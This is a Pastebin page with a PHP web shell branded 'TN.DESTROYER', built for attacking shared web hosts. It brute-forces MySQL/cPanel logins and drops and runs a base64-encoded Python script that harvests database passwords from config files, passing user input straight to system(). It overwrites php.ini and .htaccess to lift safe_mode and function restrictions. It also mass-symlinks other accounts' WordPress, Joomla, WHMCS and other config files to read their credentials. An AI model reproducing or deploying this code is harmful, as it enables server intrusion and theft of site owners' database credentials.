Advertisement
TNDESTROYER

TLD

Dec 13th, 2017
193
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php ?>
  2. <html>
  3. <title>TN.DESTROYER</title>
  4. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5. <?php
  6. /* coded By TN.DESTROYER */
  7. @set_time_limit(0);
  8. @error_reporting(0);
  9. $login_time = 3600 * 24 * 7;
  10. $hijau = array("#00FF00", "#006400", "#888888");
  11. $merah = array("#FF0000", "#640000", "#888888");
  12. $biru = array("#0000FF", "#000064", "#888888");
  13. $kuning = array("#FFFF00", "#646400", "#888888");
  14. $cyan = array("#00FFFF", "#006464", "#888888");
  15. $pink = array("#FF00FF", "#640064", "#888888");
  16. $theme = "hijau";
  17. if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  18. switch (isset($_GET['x'])) {
  19.     case 'green':
  20.         if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  21.         $theme = "hijau";
  22.         setcookie("theme", $theme, time() + $login_time);
  23.         break;
  24.     case 'red':
  25.         if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  26.         $theme = "merah";
  27.         setcookie("theme", $theme, time() + $login_time);
  28.         break;
  29.     case 'blue':
  30.         if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  31.         $theme = "biru";
  32.         setcookie("theme", $theme, time() + $login_time);
  33.         break;
  34.     case 'yellow':
  35.         if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  36.         $theme = "kuning";
  37.         setcookie("theme", $theme, time() + $login_time);
  38.         break;
  39.     case 'cyan':
  40.         if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  41.         $theme = "cyan";
  42.         setcookie("theme", $theme, time() + $login_time);
  43.         break;
  44.     case 'pink':
  45.         if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  46.         $theme = "pink";
  47.         setcookie("theme", $theme, time() + $login_time);
  48.         break;
  49.     }
  50.     if ($theme == "hijau") {
  51.         $color = $hijau;
  52.     } elseif ($theme == "merah") {
  53.         $color = $merah;
  54.     } elseif ($theme == "biru") {
  55.         $color = $biru;
  56.     } elseif ($theme == "kuning") {
  57.         $color = $kuning;
  58.     } elseif ($theme == "cyan") {
  59.         $color = $cyan;
  60.     } else {
  61.         $color = $pink;
  62.     }
  63.     echo '<head>
  64. <style type="text/css">
  65. <!--
  66. body {
  67.     background-color: #000000;
  68.     font-family: Verdana;
  69.    font-size: 13px;
  70.     color: #e1e1e1;
  71.     margin:5px;
  72. }
  73. input,textarea,select{
  74. color: ' . $color[0] . ';
  75. font-size: 13px;
  76. border: 1px solid ' . $color[0] . ';
  77. background-color: #080808;
  78. }
  79. input:hover,textarea:hover,select:hover{
  80. color: ' . $color[0] . ';
  81. font-size: 13px;
  82. border: 1px solid ' . $color[0] . ';
  83. background-color: #080808;
  84. }
  85. a {
  86.     background-color: #000000;
  87.     vertical-align: bottom;
  88.     text-decoration: none;
  89.     font-size: 13px;
  90.     color:' . $color[0] . ';
  91. }
  92. a:hover {
  93.     background-color: #080808;
  94.     vertical-align: bottom;
  95.     text-decoration: none;
  96.     font-size: 13px;
  97.     color:' . $color[0] . ';
  98. }
  99. .label {
  100.     font-size: 13px;
  101.     color: #e1e1e1;
  102.     padding:3px;
  103. }
  104. td {
  105. border-bottom:2px solid #222222;
  106. background:#222;
  107. }
  108. -->
  109. </style>
  110. </head>
  111. ';
  112.     if (isset($_POST['page']) == 'find') {
  113.         if (isset($_POST['usernames']) && isset($_POST['passwords'])) {
  114.             if ($_POST['type'] == 'passwd') {
  115.                 $e = explode("
  116. ", $_POST['usernames']);
  117.                 foreach ($e as $value) {
  118.                     $k = explode(":", $value);
  119.                     $username.= $k['0'] . " ";
  120.                 }
  121.             } elseif ($_POST['type'] == 'simple') {
  122.                 $username = str_replace("
  123. ", ' ', $_POST['usernames']);
  124.             }
  125.             $a1 = explode(" ", $username);
  126.             $a2 = explode("
  127. ", $_POST['passwords']);
  128.             $id2 = count($a2);
  129.             $ok = 0;
  130.             foreach ($a1 as $user) {
  131.                 if ($user !== '') {
  132.                     $user = trim($user);
  133.                     for ($i = 0;$i <= $id2;$i++) {
  134.                         $pass = trim($a2[$i]);
  135.                         if (@mysql_connect('localhost', $user, $pass)) {
  136.                             echo "TN.DESTROYER ~ User : (<font color='" . $color[0] . "'>$user</font>) Pass : (<font color='" . $color[0] . "'>$pass</font>)<br />";
  137.                             $ok++;
  138.                         }
  139.                     }
  140.                 }
  141.             }
  142.             echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><hr noshade size=1>";
  143.             echo "<center>[Done] : <font color='" . $color[0] . "'>You Found</font> $ok <font color='" . $color[0] . "'>CPanel,</font> <a href=" . $_SERVER['PHP_SELF'] . " style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
  144.             exit;
  145.         }
  146.     }
  147.     if (isset($_POST['pass']) == 'password') {
  148.         error_reporting(0);
  149.         mkdir('config', 0755);
  150.         $cp = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=';
  151.         $file = fopen("cp.py", "w+");
  152.         $write = fwrite($file, base64_decode($cp));
  153.         fclose($file);
  154.         chmod("cp.py", 0755);
  155.         $url = $_POST['url'];
  156.         echo "<center>
  157. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
  158.         system("python cp.py $url config");
  159.         unlink('cp.py');
  160.         echo "</textarea>
  161. </center>";
  162.         echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><br/><center>[Done] : <span style='color:" . $color[0] . ";'>Successfull, </span> <a href=" . $_SERVER['PHP_SELF'] . " style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
  163.         exit;
  164.     }
  165.     if (isset($_POST['matikan']) == 'sekatan') {
  166.         @error_reporting(0);
  167.         $phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
  168.         $file = fopen("php.ini", "w+");
  169.         $write = fwrite($file, base64_decode($phpini));
  170.         fclose($file);
  171.         $htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
  172.         $file = fopen(".htaccess", "w+");
  173.         $write = fwrite($file, base64_decode($htaccess));
  174.         echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><br/><center>[Done] : <span style='color:" . $color[0] . ";'>Successfull, </span> <a href=" . $_SERVER['PHP_SELF'] . " style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
  175.         exit;
  176.     }
  177.     if (isset($_POST['mendapatkan']) == 'passwd') {
  178.         @set_magic_quotes_runtime(0);
  179.         ob_start();
  180.         error_reporting(0);
  181.         @set_time_limit(0);
  182.         @ini_set('max_execution_time', 0);
  183.         @ini_set('output_buffering', 0);
  184.         $fn = $_POST['foldername'];
  185.         function syml($usern, $pdomain) {
  186.             symlink('/home/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  187.             symlink('/home/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  188.             symlink('/home/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  189.             symlink('/home/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  190.             symlink('/home/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  191.             symlink('/home/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  192.             symlink('/home/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  193.             symlink('/home/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  194.             symlink('/home/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  195.             symlink('/home/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  196.             symlink('/home/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  197.             symlink('/home/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  198.             symlink('/home/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  199.             symlink('/home/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  200.             symlink('/home/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  201.             symlink('/home/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  202.             symlink('/home/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  203.             symlink('/home/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  204.             symlink('/home/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  205.             symlink('/home/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  206.             symlink('/home/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  207.             symlink('/home/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  208.             symlink('/home/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  209.             symlink('/home/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  210.             symlink('/home/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  211.             symlink('/home/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  212.             symlink('/home/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  213.             symlink('/home/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  214.             symlink('/home/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  215.             symlink('/home/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  216.             symlink('/home/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  217.             symlink('/home/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  218.             symlink('/home/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  219.             symlink('/home/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  220.             symlink('/home/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  221.             symlink('/home/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  222.             symlink('/home/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  223.             symlink('/home/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  224.             symlink('/home/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  225.             symlink('/home/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  226.             symlink('/home/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  227.             symlink('/home/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  228.             symlink('/home2/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  229.             symlink('/home2/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  230.             symlink('/home2/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  231.             symlink('/home2/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  232.             symlink('/home2/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  233.             symlink('/home2/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  234.             symlink('/home2/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  235.             symlink('/home2/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  236.             symlink('/home2/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  237.             symlink('/home2/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  238.             symlink('/home2/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  239.             symlink('/home2/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  240.             symlink('/home2/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  241.             symlink('/home2/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  242.             symlink('/home2/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  243.             symlink('/home2/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  244.             symlink('/home2/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  245.             symlink('/home2/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  246.             symlink('/home2/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  247.             symlink('/home2/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  248.             symlink('/home2/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  249.             symlink('/home2/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  250.             symlink('/home2/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  251.             symlink('/home2/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  252.             symlink('/home2/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  253.             symlink('/home2/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  254.             symlink('/home2/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  255.             symlink('/home2/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  256.             symlink('/home2/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  257.             symlink('/home2/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  258.             symlink('/home2/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  259.             symlink('/home2/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  260.             symlink('/home2/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  261.             symlink('/home2/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  262.             symlink('/home2/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  263.             symlink('/home2/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  264.             symlink('/home2/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  265.             symlink('/home2/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  266.             symlink('/home2/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  267.             symlink('/home2/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  268.             symlink('/home2/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
